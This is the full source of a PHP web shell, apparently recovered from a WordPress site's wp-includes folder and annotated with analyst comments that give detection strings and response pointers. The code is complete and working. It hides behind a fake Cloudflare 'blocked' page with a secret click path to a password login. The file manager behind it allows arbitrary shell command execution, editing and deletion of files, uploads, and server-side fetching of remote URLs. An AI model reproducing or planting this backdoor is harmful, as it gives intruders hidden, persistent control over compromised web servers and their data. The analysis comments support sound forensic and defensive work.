File: //home/pelakir/www/wp-includes/class-info.php
<?php
// Analyst note: bootstrap and request router of a password-gated web file
// manager whose default response imitates a Cloudflare "blocked" page.
// Log-hunting keys that appear in this block: query parameters `logout`,
// `fm`, `access_fm`, `cf`, and the session key `alfa_session`.
session_start();
// Error output is switched off and the execution time limit is removed.
error_reporting(0);
set_time_limit(0);
// Generated locally on every request; it is only printed as the
// "Cloudflare Ray ID" on the decoy page and is not issued by Cloudflare.
$ray_id = bin2hex(random_bytes(8));
// Displayed on the decoy page only. The first two candidates are request
// headers, REMOTE_ADDR is the fallback, '127.0.0.1' the last resort.
$ip_address = isset($_SERVER['HTTP_CF_CONNECTING_IP']) ? $_SERVER['HTTP_CF_CONNECTING_IP'] :
(isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] :
(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '127.0.0.1'));
$timestamp = date('Y-m-d H:i');
// bcrypt-format hash ($2a$, cost 16) checked with password_verify() in
// showFmLogin(). The plaintext is not present in the file; the hash string
// itself is a stable value for matching related samples.
$stored_hash = '$2a$16$tnJwbScpyXgA4kehCm902OKmgQmkq2gVbnhxrG3hHdXr0OZpxml/e';
// ?logout: drop the session and return to the bare URL (decoy page).
if (isset($_GET['logout'])) {
session_destroy();
header("Location: ?");
exit;
}
// ?fm with an authenticated session: serve the file manager.
if (isset($_GET['fm']) && isset($_SESSION['alfa_session']) && $_SESSION['alfa_session'] === true) {
showFileManager();
exit;
}
// ?access_fm=1 is what the decoy page's inline script navigates to; it only
// redirects to ?fm=1.
if (isset($_GET['access_fm']) && $_GET['access_fm'] === '1') {
header("Location: ?fm=1");
exit;
}
// If FM mode is requested but the session is not logged in, show the login form.
if (isset($_GET['fm'])) {
showFmLogin();
exit;
}
// ?cf: same effect as ?logout (session destroyed, back to the decoy page).
if (isset($_GET['cf'])) {
session_destroy();
header("Location: ?");
exit;
}
// Default for every other request: the decoy block page.
showCloudflareBlock();
/**
 * Analyst note: prints a static HTML page that imitates a Cloudflare
 * "Sorry, you have been blocked" response and then exits.
 *
 * Nothing on the page comes from Cloudflare: the Ray ID is the locally
 * generated $ray_id, the host name is read from HTTP_HOST and the IP from
 * $ip_address (both HTML-escaped before output).
 *
 * The inline script handleIpClick() is the only interactive part: the first
 * click on "Click to reveal" shows the IP, a click on the already revealed
 * value navigates to ?access_fm=1, which the router turns into the login form.
 * A request for ?access_fm=1 or ?fm=1 in the access log therefore marks
 * operator activity rather than an ordinary visitor.
 */
function showCloudflareBlock() {
global $ray_id, $ip_address, $timestamp;
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta timestamp="<?php echo $timestamp; ?>" />
<title>Sorry, you have been blocked</title>
<style>
* { margin: 0; padding: 0; box-sizing: border-box; }
html, body { min-height: 100%; }
body {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Arial, Helvetica, sans-serif;
background: linear-gradient(to bottom, #f2f2f2 0, #ececec 150px, #f6f6f6 151px, #f6f6f6 100%);
color: #333;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.page { width: 100%; }
.top-area { padding: 32px 0 0; }
.header { max-width: 1120px; margin: 0 auto; padding: 0 34px; }
.header h1 { font-size: 52px; font-weight: 300; line-height: 1.08; letter-spacing: -1px; color: #333; margin-bottom: 8px; }
.header .subtext { font-size: 18px; line-height: 1.35; color: #4f4f4f; font-weight: 400; }
.mockup-band { width: 100%; margin-top: 26px; background: #e6e6e6; border-top: 1px solid #dddddd; border-bottom: 1px solid #dddddd; padding: 54px 0 0; }
.mockup-wrap { max-width: 1120px; margin: 0 auto; padding: 0 34px; }
.browser-shell { width: 100%; }
.browser-bar { height: 46px; background: #a7a7a7; border-radius: 2px 2px 0 0; position: relative; overflow: hidden; }
.browser-topline { height: 100%; display: flex; align-items: flex-start; padding: 9px 0 0 13px; }
.dot { width: 10px; height: 10px; border-radius: 50%; background: #e3e3e3; margin-right: 5px; flex: 0 0 auto; }
.fake-tab { width: 146px; height: 21px; background: #e3e3e3; margin-left: 12px; clip-path: polygon(8% 100%, 0 0, 92% 0, 100% 100%); border-radius: 2px 2px 0 0; flex: 0 0 auto; }
.browser-content { background: #ffffff; min-height: 360px; display: flex; align-items: center; justify-content: center; position: relative; }
.error-circle { width: 142px; height: 142px; border-radius: 50%; background: #c81d1d; display: flex; align-items: center; justify-content: center; }
.error-circle svg { width: 74px; height: 74px; fill: #fff; display: block; }
.info-area { max-width: 1120px; margin: 0 auto; padding: 28px 34px 0; background: #f6f6f6; }
.info-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 56px; }
.info-block h2 { font-size: 28px; line-height: 1.2; font-weight: 400; color: #2f2f2f; margin-bottom: 16px; }
.info-block p { font-size: 14px; line-height: 1.6; color: #333; font-weight: 400; max-width: 470px; }
.footer { max-width: 1120px; margin: 30px auto 0; padding: 0 34px 16px; background: #f6f6f6; }
.footer-line { border-top: 1px solid #dddddd; padding-top: 16px; text-align: center; font-size: 12px; line-height: 1.6; color: #666; }
.footer-line strong { font-weight: 600; color: #444; }
.footer-line a { color: #2b73b6; text-decoration: none; }
.footer-line a:hover { text-decoration: underline; }
.reveal-ip { color: #2b73b6; cursor: pointer; transition: all 0.2s ease; }
.reveal-ip:hover { text-decoration: underline; }
.ip-revealed { color: #333; font-weight: 500; letter-spacing: 1px; cursor: pointer; position: relative; }
.ip-revealed:hover { color: #2b73b6; text-decoration: underline; }opacity 0.2s; }
.ip-revealed:hover::after { opacity: 1; }
.sep { color: #999; margin: 0 6px; }
@media (max-width: 900px) {
.header h1 { font-size: 40px; }
.info-grid { grid-template-columns: 1fr; gap: 34px; }
.browser-content { min-height: 300px; }
.error-circle { width: 120px; height: 120px; }
.error-circle svg { width: 64px; height: 64px; }
}
@media (max-width: 640px) {
.top-area { padding-top: 24px; }
.header, .mockup-wrap, .info-area, .footer { padding-left: 18px; padding-right: 18px; }
.header h1 { font-size: 34px; }
.header .subtext { font-size: 16px; }
.browser-bar { height: 40px; }
.fake-tab { width: 110px; height: 18px; }
.info-block h2 { font-size: 24px; }
}
</style>
</head>
<body>
<div class="page">
<div class="top-area">
<div class="header">
<h1>Sorry, you have been blocked</h1>
<p class="subtext">You are unable to access <?php echo htmlspecialchars($_SERVER['HTTP_HOST'] ?? 'example.com', ENT_QUOTES, 'UTF-8'); ?></p>
</div>
<div class="mockup-band">
<div class="mockup-wrap">
<div class="browser-shell">
<div class="browser-bar">
<div class="browser-topline">
<span class="dot"></span>
<span class="dot"></span>
<span class="dot"></span>
<div class="fake-tab"></div>
</div>
</div>
<div class="browser-content">
<div class="error-circle">
<svg viewBox="0 0 24 24" aria-hidden="true">
<path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/>
</svg>
</div>
</div>
</div>
</div>
</div>
<div class="info-area">
<div class="info-grid">
<div class="info-block">
<h2>Why have I been blocked?</h2>
<p>This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.</p>
</div>
<div class="info-block">
<h2>What can I do to resolve this?</h2>
<p>You can email the site owner to let them know you were blocked. Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.</p>
</div>
</div>
</div>
<div class="footer">
<div class="footer-line">
<span>Cloudflare Ray ID: <strong><?php echo $ray_id; ?></strong></span>
<span class="sep">โข</span>
<span>Your IP: <span id="ip-display" class="reveal-ip" onclick="handleIpClick(this)" data-ip="<?php echo htmlspecialchars($ip_address, ENT_QUOTES, 'UTF-8'); ?>">Click to reveal</span></span>
<span class="sep">โข</span>
<span>Performance & security by <a href="https://www.cloudflare.com/" target="_blank" rel="noopener noreferrer">Cloudflare</a></span>
</div>
</div>
</div>
</div>
<script>
function handleIpClick(element) {
const ip = element.getAttribute('data-ip');
if (element.classList.contains('revealed')) {
element.style.cursor = 'wait';
element.textContent = 'Accessing...';
window.location.href = '?access_fm=1';
} else {
element.textContent = ip;
element.classList.remove('reveal-ip');
element.classList.add('ip-revealed');
element.classList.add('revealed');
}
}
</script>
</body>
</html>
<?php
// Terminate the request once the decoy page has been sent.
exit;
}
/**
 * Analyst note: login gate in front of the file manager.
 *
 * A POST carrying the field `login` has its `p` field checked with
 * password_verify() against $stored_hash. On a match the session keys
 * `alfa_session` (true) and `login_time` are set and the browser is
 * redirected to ?fm=1; otherwise the form is shown again with an error line.
 *
 * In access logs a login attempt is a POST to ?fm=...; a success is followed
 * by the redirect to ?fm=1. The page title and heading contain the string
 * "DUM CAT LOGIN", which can serve as a content signature.
 */
function showFmLogin() {
global $stored_hash;
$login_error = '';
// Process the login submission
if (isset($_POST['login'])) {
if (password_verify($_POST['p'], $stored_hash)) {
// This flag is the only thing the router checks before serving the file manager.
$_SESSION['alfa_session'] = true;
$_SESSION['login_time'] = date('Y-m-d H:i:s');
header("Location: ?fm=1");
exit;
} else {
$login_error = "โ Password salah!";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>๐โโฌ DUM CAT LOGIN</title>
<style>
body {
background: #000;
color: #0f0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
font-family: monospace;
margin: 0;
}
form {
text-align: center;
}
h3 {
margin-bottom: 20px;
}
input[type="password"] {
background: #000;
border: 1px solid #333;
color: #0f0;
padding: 10px;
font-family: monospace;
font-size: 14px;
width: 200px;
}
button {
width: 200px;
background: #0f0;
color: #000;
border: none;
cursor: pointer;
padding: 10px;
font-weight: bold;
margin-top: 15px;
}
.error {
color: #ff4444;
margin-bottom: 10px;
}
</style>
</head>
<body>
<form method="POST">
<h3>[ DUM CAT LOGIN ]</h3>
<?php if (!empty($login_error)) echo '<p class="error">' . $login_error . '</p>'; ?>
<input type="password" name="p" placeholder="" autofocus><br><br>
<button type="submit" name="login">ENTER</button>
</form>
</body>
</html>
<?php
// Terminate the request once the login page has been sent.
exit;
}
/**
 * Analyst note: post-login panel, called by the router only when
 * $_SESSION['alfa_session'] === true. Every operation below acts on
 * request-supplied paths and data with the privileges of the PHP process;
 * no base-directory restriction is applied anywhere in this function.
 *
 * Capabilities visible in this function, with the request fields that drive
 * them (useful as log and WAF search terms):
 *  - directory browsing: ?path= (chdir + scandir, owner/size/mode listing)
 *  - read and overwrite a file: ?edit= and POST save_file, filepath, filecontent
 *  - rename / create file / create directory: POST do_rename, do_make_file,
 *    do_make_dir (old_name, new_name, n_file, n_dir)
 *  - recursive delete driven by a GET parameter: ?del=
 *  - browser upload: POST do_upload (multipart field `file`)
 *  - server-side fetch of a URL via copy(): POST rem_upload, url
 *  - command execution via shell_exec(): ?action=terminal, POST exec_cmd, cmd
 *
 * Response pointers: once this file is found, treat everything writable by
 * the web-server account as untrusted, compare the site against known-good
 * sources, and review access logs for the field names above. The PHP
 * settings disable_functions (for shell_exec) and allow_url_fopen (for the
 * URL fetch) can limit two of the capabilities; the plain file operations
 * are unaffected by them.
 */
function showFileManager() {
// FIX: more robust path handling
$path = isset($_GET['path']) ? $_GET['path'] : __DIR__;
// Collapse repeated slashes in the path
$path = preg_replace('#/+#', '/', $path);
$real_path = realpath($path);
// If realpath() fails, fall back to the path as supplied
if ($real_path === false) {
$real_path = $path;
}
// Make sure the path is a directory; otherwise use this script's directory
if (!is_dir($real_path)) {
$real_path = realpath(__DIR__);
}
// If still empty, use the filesystem root
if (empty($real_path)) {
$real_path = '/';
}
$path = $real_path;
chdir($path);
// File operations
// Overwrites the file named in POST `filepath` with POST `filecontent`.
if (isset($_POST['save_file'])) {
file_put_contents($_POST['filepath'], $_POST['filecontent']);
}
if (isset($_POST['do_rename'])) {
rename($_POST['old_name'], $path . '/' . $_POST['new_name']);
}
if (isset($_POST['do_make_file'])) {
file_put_contents($path . '/' . $_POST['n_file'], "");
}
if (isset($_POST['do_make_dir'])) {
mkdir($path . '/' . $_POST['n_dir']);
}
// Deletion is triggered by a GET parameter, so it shows up in the access
// log query string.
if (isset($_GET['del'])) {
$target = $_GET['del'];
// Declared inside this branch, so it only exists for requests carrying ?del=.
// Removes a directory tree depth-first, or unlinks a single file.
function rmdir_recursive($dir) {
if (is_dir($dir)) {
$files = array_diff(scandir($dir), array('.', '..'));
foreach ($files as $file) rmdir_recursive("$dir/$file");
rmdir($dir);
} else unlink($dir);
}
rmdir_recursive($target);
header("Location: ?fm=1&path=".urlencode($path));
exit;
}
// The stored file name is the client-supplied name from the upload.
if (isset($_POST['do_upload'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $path.'/'.$_FILES['file']['name']);
}
// The server itself fetches POST `url` and stores it under the URL's basename;
// this produces an outbound connection from the web host.
if (isset($_POST['rem_upload'])) {
copy($_POST['url'], $path.'/'.basename($_POST['url']));
}
// FIX: more robust get_pwd helper
// Builds the breadcrumb for the current directory: one link per path
// segment pointing at ?fm=1&path=<prefix>. Segment text is HTML-escaped and
// the prefix is URL-encoded. Returns '/' for an empty or root path.
function get_pwd($current_path) {
// Clean up the path
$current_path = trim($current_path);
$current_path = preg_replace('#/+#', '/', $current_path);
// Empty or root
if (empty($current_path) || $current_path === '/') {
return '/';
}
// Split the path into segments
$parts = explode('/', $current_path);
$result = '';
$accumulated = '';
foreach ($parts as $part) {
if (empty($part)) continue;
$accumulated .= '/' . $part;
$result .= '/<a href="?fm=1&path='.urlencode($accumulated).'" style="color:#0f0;text-decoration:none;">'.htmlspecialchars($part).'</a>';
}
// If nothing was produced, return root
if (empty($result)) {
return '/';
}
return $result;
}
// Returns "user/group" names for the file's owner via the posix functions,
// or 'N/A' when those functions are unavailable or stat() fails.
function get_user_group($file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$stat = stat($file);
if ($stat) {
$uid = $stat['uid'];
$gid = $stat['gid'];
$user_info = posix_getpwuid($uid);
$group_info = posix_getgrgid($gid);
return $user_info['name'] . '/' . $group_info['name'];
}
}
return 'N/A';
}
?>
<!DOCTYPE html>
<html>
<head>
<title>๐โโฌ DUM CAT FILE MANAGER PRO</title>
<style>
body { background: #000; color: #c9d1d9; font-family: monospace; font-size: 12px; margin: 0; }
/* FIX: PWD bar dengan layout flex untuk menghindari overlap */
.pwd-bar {
background: #000;
padding: 10px;
border-left: 5px solid #0f0;
border-bottom: 1px solid #333;
display: flex;
justify-content: space-between;
align-items: center;
}
.pwd-left {
flex: 1;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.pwd-right {
margin-left: 15px;
flex-shrink: 0;
}
.pwd-bar a {
color: #ff4444;
font-weight: bold;
text-decoration: none;
}
.nav { display: flex; gap: 5px; padding: 10px; background: #0d1117; flex-wrap: wrap; }
.btn-nav { border: 1px solid #333; padding: 4px 10px; color: #0f0; background: #161b22; cursor: pointer; text-decoration: none; border-radius:3px; transition: all 0.3s; }
.btn-nav:hover { background: #0f0 !important; color: #000 !important; }
table { width: 100%; border-collapse: collapse; }
th { background: #161b22; color: #8b949e; padding: 8px; text-align: left; }
td { padding: 6px 10px; border-bottom: 1px solid #21262d; }
.action-link { color: #fff; text-decoration: none; margin-right: 8px; font-weight: bold; cursor: pointer; }
.action-link:hover { color: #0f0 !important; }
.user-group { color: #58a6ff; font-size: 11px; }
input[type="text"], textarea, input[type="file"] { background: #000; border: 1px solid #333; color: #0f0; padding: 5px; font-family: monospace; }
.go { color: #0f0; background: none; border: 1px solid #0f0; cursor: pointer; font-size: 14px; font-weight: bold; padding: 4px 12px; border-radius: 3px; transition: all 0.3s; }
.go:hover { background: #0f0; color: #000; }
pre { background: #0d1117; color: #0f0; padding: 10px; border: 1px solid #333; overflow: auto; max-height: 400px; text-align: left; white-space: pre-wrap; font-size: 11px; line-height: 1.4; }
.success { color: #0f0; font-weight: bold; padding: 10px; background: #0a1a0a; border-left: 4px solid #0f0; margin: 10px 0; }
tr:hover { background: rgba(15,255,0,0.05) !important; }
.editor { width: 100%; height: 500px; font-family: monospace; font-size: 13px; }
</style>
</head>
<body>
<!-- FIX: PWD bar dengan layout flex -->
<div class="pwd-bar">
<div class="pwd-left">
๐โโฌ PWD: <?php echo get_pwd($path); ?>
</div>
<div class="pwd-right">
<a href="?logout=1">[ ๐ช Logout ]</a>
</div>
</div>
<div class="nav">
<a href="?fm=1&path=<?php echo urlencode($path); ?>" class="btn-nav">๐ Refresh</a>
<a href="?fm=1&action=terminal&path=<?php echo urlencode($path); ?>" class="btn-nav">๐ป Terminal</a>
<a href="?cf=1" class="btn-nav" style="background:#ff4444;color:#fff;">๐ Back to CF Page</a>
</div>
<?php if (isset($_POST['do_upload'])): ?>
<div class="success">โ
File uploaded: <?php echo $_FILES['file']['name']; ?></div>
<?php endif; ?>
<?php if (isset($_POST['rem_upload'])): ?>
<div class="success">โ
Downloaded: <?php echo basename($_POST['url']); ?></div>
<?php endif; ?>
<?php if (isset($_GET['action']) && $_GET['action'] == 'terminal'): ?>
<div style="padding:20px;">
<h3 style="color:#0f0;">>__ Terminal Console (Path: <?php echo $path; ?>)</h3>
<form method="POST">
<input type="text" name="cmd" style="width:80%;" placeholder="ls -la" autofocus>
<button type="submit" name="exec_cmd" class="go">ยป EXECUTE</button>
</form>
<?php if(isset($_POST['exec_cmd'])): ?>
<pre><?php echo htmlspecialchars(shell_exec("timeout 10 " . $_POST['cmd'] . " 2>&1")); ?></pre>
<?php endif; ?>
</div>
<?php elseif(isset($_GET['edit'])): ?>
<div style="padding:20px;">
<h3 style="color:#0f0;">โ๏ธ Editing: <span style="color:#58a6ff;"><?php echo basename($_GET['edit']); ?></span></h3>
<form method="POST">
<input type="hidden" name="filepath" value="<?php echo $_GET['edit']; ?>">
<textarea name="filecontent" class="editor"><?php echo htmlspecialchars(file_get_contents($_GET['edit'])); ?></textarea><br><br>
<button type="submit" name="save_file" class="go" style="background:#0f0; color:#000; font-size:16px; padding:12px 24px;">๐พ SAVE CHANGES</button>
<a href="?fm=1&path=<?php echo urlencode($path); ?>" class="btn-nav" style="margin-left:15px;">โ Back</a>
</form>
</div>
<?php elseif(isset($_GET['ren'])): ?>
<div style="padding:20px; text-align:center;">
<h3 style="color:#0f0;">๐ Rename: <span style="color:#fff;"><?php echo basename($_GET['ren']); ?></span></h3>
<form method="POST">
<input type="hidden" name="old_name" value="<?php echo $_GET['ren']; ?>">
<input type="text" name="new_name" value="<?php echo htmlspecialchars(basename($_GET['ren'])); ?>" style="width:400px; font-size:14px;" autofocus>
<button type="submit" name="do_rename" class="go" style="font-size:16px;">โ
RENAME</button>
</form>
<a href="?fm=1&path=<?php echo urlencode($path); ?>" class="btn-nav" style="margin-top:15px; display:inline-block;">โ Back</a>
</div>
<?php else: ?>
<table>
<thead><tr><th style="width:35%">๐ Name</th><th>User/Group</th><th>Size</th><th>Perms</th><th>Actions</th></tr></thead>
<tbody>
<?php
// Default view: list the current directory, directories first, then files.
$dirs = [];
$files = [];
foreach (scandir($path) as $item):
if($item == "." || $item == "..") continue;
$f = $path.'/'.$item;
$isDir = is_dir($f);
// Size is shown as '-' for directories, otherwise in KB, or MB above 1 MiB.
$size = $isDir ? '-' : (filesize($f) > 1024*1024 ? round(filesize($f)/1024/1024,1).'MB' : round(filesize($f)/1024,1).'KB');
$usergroup = get_user_group($f);
if ($isDir) {
$dirs[] = ['item' => $item, 'f' => $f, 'size' => $size, 'usergroup' => $usergroup];
} else {
$files[] = ['item' => $item, 'f' => $f, 'size' => $size, 'usergroup' => $usergroup];
}
endforeach;
foreach ($dirs as $dir):
$item = $dir['item'];
$f = $dir['f'];
$size = $dir['size'];
$usergroup = $dir['usergroup'];
?>
<tr>
<td style="font-weight:500;"><span style="color:#e3b341;">๐ DIR</span>
<a href="?fm=1&path=<?php echo urlencode($f); ?>" style="color:#e3b341;"><?php echo htmlspecialchars($item); ?>/</a>
</td>
<td class="user-group"><?php echo $usergroup; ?></td>
<td style="color:#8b949e;"><?php echo $size; ?></td>
<td style="color:#0f0; font-family:monospace;"><?php echo substr(sprintf('%o', fileperms($f)), -4); ?></td>
<td style="white-space:nowrap;">
<a href="?fm=1&ren=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#f59e0b;" title="Rename">๐</a>
<a href="?fm=1&del=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#ff4444;" onclick="return confirm('๐๏ธ Delete <?= $item ?>?')" title="Delete">๐๏ธ</a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach ($files as $file):
$item = $file['item'];
$f = $file['f'];
$size = $file['size'];
$usergroup = $file['usergroup'];
?>
<tr>
<td style="font-weight:500;"><span style="color:#58a6ff;">๐</span>
<a href="?fm=1&edit=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" style="color:#58a6ff;"><?php echo htmlspecialchars($item); ?></a>
</td>
<td class="user-group"><?php echo $usergroup; ?></td>
<td style="color:#8b949e;"><?php echo $size; ?></td>
<td style="color:#0f0; font-family:monospace;"><?php echo substr(sprintf('%o', fileperms($f)), -4); ?></td>
<td style="white-space:nowrap;">
<a href="?fm=1&ren=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#f59e0b;" title="Rename">๐</a>
<a href="?fm=1&edit=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#58a6ff;" title="Edit">โ๏ธ</a>
<a href="?fm=1&del=<?php echo urlencode($f); ?>&path=<?php echo urlencode($path); ?>" class="action-link" style="color:#ff4444;" onclick="return confirm('๐๏ธ Delete <?= $item ?>?')" title="Delete">๐๏ธ</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<div style="background: #0d1117; border-top: 1px solid #333; padding: 25px; display: grid; grid-template-columns: repeat(auto-fit, minmax(280px, 1fr)); gap: 20px; margin-top:15px;">
<div style="text-align:center;">
<strong style="color:#0f0;">๐ Make File</strong><br>
<form method="POST" style="margin-top:10px;">
<input type="text" name="n_file" placeholder="shell.php" style="width:70%;">
<button name="do_make_file" class="go">โถ๏ธ</button>
</form>
</div>
<div style="text-align:center;">
<strong style="color:#e3b341;">๐ Make Directory</strong><br>
<form method="POST" style="margin-top:10px;">
<input type="text" name="n_dir" placeholder="new_folder" style="width:70%;">
<button name="do_make_dir" class="go">โถ๏ธ</button>
</form>
</div>
<div style="text-align:center;">
<strong style="color:#58a6ff;">๐ค Local Upload</strong><br>
๐ <span style="color:#0f0;"><?php echo basename($path); ?></span><br>
<form method="POST" enctype="multipart/form-data" style="margin-top:10px;">
<input type="file" name="file" style="width:70%; color:#0f0;">
<button name="do_upload" class="go">โถ๏ธ</button>
</form>
</div>
<div style="text-align:center;">
<strong style="color:#ff6b6b;">๐ Remote Upload</strong><br>
<form method="POST" style="margin-top:10px;">
<input type="text" name="url" placeholder="http://site.com/file.txt" style="width:70%;">
<button name="rem_upload" class="go">โถ๏ธ</button>
</form>
</div>
</div>
<?php endif; ?>
<div style="text-align:center; color:#666; padding:30px; font-size:11px; border-top:1px solid #333; margin-top:20px;">
๐โโฌ <strong>DUM CAT FILE MANAGER PRO v2.0</strong> |
Login: <?php echo $_SESSION['login_time'] ?? 'Unknown'; ?>
</div>
</body>
</html>
<?php
// Terminate the request once the panel has been sent.
exit;
}
?>